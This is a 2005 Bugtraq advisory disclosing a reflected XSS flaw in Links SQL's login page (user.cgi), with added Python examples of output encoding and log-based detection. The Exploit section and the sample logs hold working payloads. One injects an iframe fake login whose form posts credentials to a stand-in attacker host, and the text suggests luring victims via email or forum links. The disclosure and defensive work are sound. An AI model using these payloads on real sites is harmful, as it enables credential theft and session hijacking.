
List:       bugtraq
Subject:    Gossamer Threads Links SQL login XSS Vulnerability
From:       Nathan House <nhouse () stationx ! net>
Date:       2005-05-04 9:12:02
Message-ID: 20050504091202.23541.qmail () www ! securityfocus ! com



Gossamer Threads Links SQL login XSS Vulnerability

Class: Input Validation, XSS
Remote: Yes
Local: Yes
Published / Updated: 4th May 2005

Vulnerable
Vulnerable: Gossamer Threads Links SQL
   + Links SQL 2.x
   + Links SQL 2.2.x
   + Links SQL 3.0


Not Vulnerable
Gossamer Links 3.0.1 (the fixed release, see Solution below)

Discussion
Links SQL is a Perl/mod_perl/PHP web application written by Gossamer Threads that is used to build directories of any type. Although designed to manage links, Links SQL is highly customisable and is used across the Internet for a wide range of tasks such as image galleries, press releases, yellow pages, company directories and other categorised databases.

The url variable in the Gossamer Threads Links SQL login page (user.cgi) is a hidden field in the login form and can also be supplied directly in the query string, as user.cgi?url=xyz. It is client-side input that the browser sets when a user follows a link to a page that requires authentication; after authentication the user is redirected to the URL it holds. user.cgi does not sufficiently validate or encode this value before writing it back into the login form, so the page is vulnerable to script injection and cross-site scripting (XSS).


Exploit
This is a standard reflected XSS vulnerability.

Note that an attacker would normally obfuscate the linking code, but for these examples I have made it simple for the sake of understanding.

Simple Example 1 (pop-up)
/user.cgi?url="><script>alert("XSS Vulnerability")</script><"&from=rate

This results in the following HTML being injected into the page:
<input type="hidden" name="url" value=""><script>alert("XSS Vulnerability")</script><"" />


Simple Example 2 (iframe to steal username and password)
/user.cgi?url="><iframe%20src="http://www.stationx.net/linksql.html"%20scrolling="No"%20align="MIDDLE"%20width="100%"%20height="3000"%20frameborder="No"></iframe><!--&from=rate



Example 2 injects a borderless iframe that presents a fake login screen to collect usernames and passwords; the trailing <!-- comments out the remainder of the original input tag so the page still renders cleanly. The page loaded into the iframe contains a form that posts to the attacker's server, for example:
<form action="http://hacker.com/getusernameandpassword.cgi" method="post">

The injected <script> content is limited only by the imagination of the attacker; the above are just two examples.
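As an added example (not code from the advisory or from Gossamer Threads, whose Links SQL is written in Perl), the following Python reconstructs the mechanism described above in miniature: a hidden url field rendered with no output encoding beside the same field rendered with HTML attribute encoding, each checked with a tag-aware parser using the advisory's two payloads. The form template, the function names and the extra site-relative redirect check are assumptions made for illustration, not user.cgi's real template or the vendor's fix.

```python
import html
import urllib.parse
from html.parser import HTMLParser

# The advisory's two payloads, URL-decoded, exactly as user.cgi would see the
# url parameter.
PAYLOAD_POPUP = '"><script>alert("XSS Vulnerability")</script><"'
PAYLOAD_IFRAME = ('"><iframe src="http://www.stationx.net/linksql.html" scrolling="No" '
                  'align="MIDDLE" width="100%" height="3000" frameborder="No"></iframe><!--')

# Hypothetical stand-in for the login form template; user.cgi's real template
# is not reproduced here.
FORM_TEMPLATE = ('<form action="user.cgi" method="post">\n'
                 '<input type="hidden" name="url" value="{url}" />\n'
                 '<input type="text" name="username" />\n'
                 '<input type="password" name="password" />\n'
                 '<input type="submit" value="Login" />\n'
                 '</form>')


def render_login_form_vulnerable(url):
    """The reported behaviour: the url parameter goes into the hidden field as-is."""
    return FORM_TEMPLATE.format(url=url)


def render_login_form_fixed(url):
    """Hardened rendering: HTML-attribute-encode the value, so a '"' in it can no
    longer close the attribute and a '<' can no longer open a new tag."""
    return FORM_TEMPLATE.format(url=html.escape(url, quote=True))


class FormInspector(HTMLParser):
    """Records every start tag in the page and the value a browser would give the
    hidden url field (HTMLParser decodes entities in attribute values as a browser does)."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.hidden_url = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        attrs = dict(attrs)
        if tag == "input" and attrs.get("name") == "url" and self.hidden_url is None:
            self.hidden_url = attrs.get("value")


def _inspect(page):
    parser = FormInspector()
    parser.feed(page)
    parser.close()
    return parser


def injected_tags(page):
    """Tags the payloads try to smuggle into the page; an empty list means the
    value stayed inside the attribute."""
    return [t for t in _inspect(page).tags if t in ("script", "iframe")]


def hidden_url_value(page):
    """What the hidden field would actually submit once the page is parsed."""
    return _inspect(page).hidden_url


def is_local_redirect(url):
    """Extra hardening beyond the advisory's reported fix (an assumption about what a
    post-login redirect should accept): only a site-relative path is allowed, so the
    field can neither carry markup nor send the user to another site."""
    parts = urllib.parse.urlsplit(url)
    return (not parts.scheme and not parts.netloc
            and parts.path.startswith("/") and "\\" not in url)


if __name__ == "__main__":
    for name, payload in (("popup", PAYLOAD_POPUP), ("iframe", PAYLOAD_IFRAME)):
        print(name, "unencoded:", injected_tags(render_login_form_vulnerable(payload)))
        print(name, "encoded:  ", injected_tags(render_login_form_fixed(payload)))
        print(name, "accepted as redirect target:", is_local_redirect(payload))
```

With the unencoded template the parser sees a script or iframe element and the hidden field's value collapses to an empty string, which is exactly the breakout shown in Example 1; with the encoded template the same payload is parsed back as the attribute's value and no extra element exists. Encoding alone fixes the XSS; the redirect check is a separate design choice, because a field that is only ever used as a redirect target never needs to accept a scheme, a host or markup.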

Like all XSS vulnerabilities this is an attack on the user, not directly on the system (Links SQL). However, if the victim happens to be a Links SQL moderator or administrator, the attack runs with that user's privileges and can be used to escalate and then attack Links SQL itself.

To exploit this XSS vulnerability the victim must be tricked into making the above, or another carefully crafted, HTTP request. There are several ways to do this, but common methods include a link in an HTML-aware email, a post in a web-based forum (such as the Gossamer Threads forum), or a link embedded in a malicious web page.

XSS attacks are often demonstrated by harvesting cookies to perform session hijacking and by gathering other sensitive information.
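Every delivery method above ends in the same observable event: a request to user.cgi whose url parameter carries markup, and that request is recorded in the web server's access log. As an added example that is not part of the advisory, the following Python scans Apache combined-format log lines for such requests. The log lines are constructed for this example (the two attack lines carry the advisory's payloads percent-encoded as a browser would send them); the rule that a legitimate url value is always a site-relative path is an assumption about the deployment, not something the vendor states, and it is what lets the check also report obfuscated variants of the payload, which the advisory notes a real attacker would use.

```python
import re
import urllib.parse

# Constructed Apache combined-log lines; not taken from the advisory or any real server.
# Line 1 is a legitimate login redirect, lines 2 and 3 carry the advisory's payloads,
# line 4 has markup in a parameter of a different script and is deliberately out of scope.
SAMPLE_LOG = """\
203.0.113.5 - - [04/May/2005:09:12:02 +0000] "GET /cgi-bin/links/user.cgi?url=%2Fcgi-bin%2Flinks%2Frate.cgi%3FID%3D5&from=rate HTTP/1.1" 200 2314 "http://directory.example/" "Mozilla/4.0"
203.0.113.7 - - [04/May/2005:09:13:40 +0000] "GET /cgi-bin/links/user.cgi?url=%22%3E%3Cscript%3Ealert(%22XSS%20Vulnerability%22)%3C/script%3E%3C%22&from=rate HTTP/1.1" 200 2401 "http://forum.example/thread/1" "Mozilla/4.0"
203.0.113.9 - - [04/May/2005:09:14:02 +0000] "GET /cgi-bin/links/user.cgi?url=%22%3E%3Ciframe%20src=%22http://www.stationx.net/linksql.html%22%20scrolling=%22No%22%3E%3C/iframe%3E%3C!--&from=rate HTTP/1.1" 200 2590 "-" "Mozilla/4.0"
203.0.113.11 - - [04/May/2005:09:15:00 +0000] "GET /cgi-bin/links/search.cgi?query=%3Cb%3Eperl%3C/b%3E HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
"""

# Client address plus the request line of a combined-format entry.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Characters that can only be there to break out of the hidden field's attribute.
MARKUP_RE = re.compile(r'[<>"\']')


def is_local_path(value):
    """Assumed shape of a legitimate url value: a site-relative path, no scheme or host."""
    parts = urllib.parse.urlsplit(value)
    return (not parts.scheme and not parts.netloc
            and parts.path.startswith("/") and "\\" not in value)


def find_xss_attempts(log_text):
    """Return (client_ip, decoded url value, reason) for every request to user.cgi whose
    url parameter contains markup or is not a site-relative path."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        target = urllib.parse.urlsplit(match.group("target"))
        if not target.path.endswith("/user.cgi"):
            continue
        # parse_qs percent-decodes the values, so the check sees what user.cgi sees.
        params = urllib.parse.parse_qs(target.query, keep_blank_values=True)
        for value in params.get("url", []):
            if MARKUP_RE.search(value):
                hits.append((match.group("ip"), value, "markup in url parameter"))
            elif not is_local_path(value):
                hits.append((match.group("ip"), value, "url parameter is not a site-relative path"))
    return hits


if __name__ == "__main__":
    for ip, value, reason in find_xss_attempts(SAMPLE_LOG):
        print(ip, reason, repr(value))
```

The first rule catches the advisory's literal examples; the second is the one that matters once the attacker obfuscates, since whatever the encoding tricks, the decoded value still has to start a tag to do anything, and a tag is never a site-relative path. Run it over real logs after decoding, not on the raw request line, or a single %-encoded character defeats the markup rule.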


Solution
A new release has been created to fix this problem. Upgrade to Gossamer Links 3.0.1:

http://www.gossamer-threads.com/forum/Gossamer_Links_3.0.1_Released_P280986/

http://gossamer-threads.com/perl/gforum/gforum.cgi?post=281029;


Credit
Nathan House @ StationX


References
http://www.stationx.net
http://www.stationx.net/advisories.php
http://www.gossamer-threads.com/scripts/links-sql/index.htm




Legal Notice
Copyright (©) 2005 StationX (UK) Ltd., referred to as “StationX” hereafter.
This advisory, written by StationX, may be distributed freely in electronic form without permission from StationX. It may not be altered without the express written permission of StationX. If you wish to print this advisory, in whole or in part, in any non-electronic form, please contact StationX for consent.

Disclaimer
This advisory is, to the best of our knowledge and given current information, correct and accurate at the date given above under “Published / Updated”. Use of any information in this advisory is for informational purposes only, to help further the development of the security industry and to help secure systems. The information in the advisory should NOT be used adversely. StationX, the author and any publishers give no guarantees or warranties at all with regard to any information in this advisory. Under no circumstances shall StationX, the author or any publishers be liable in contract, tort or otherwise for any loss or damage whatsoever arising from use of, or in any way connected with, this advisory or any hyperlinked website, including, without limitation, damages for loss of business, loss of profits, business interruption, loss of business information, loss of programs or other data on the user's information handling system or otherwise maintained, or any other pecuniary loss (even where StationX, the author and any publishers have been advised of the possibility of such loss or damage arising).

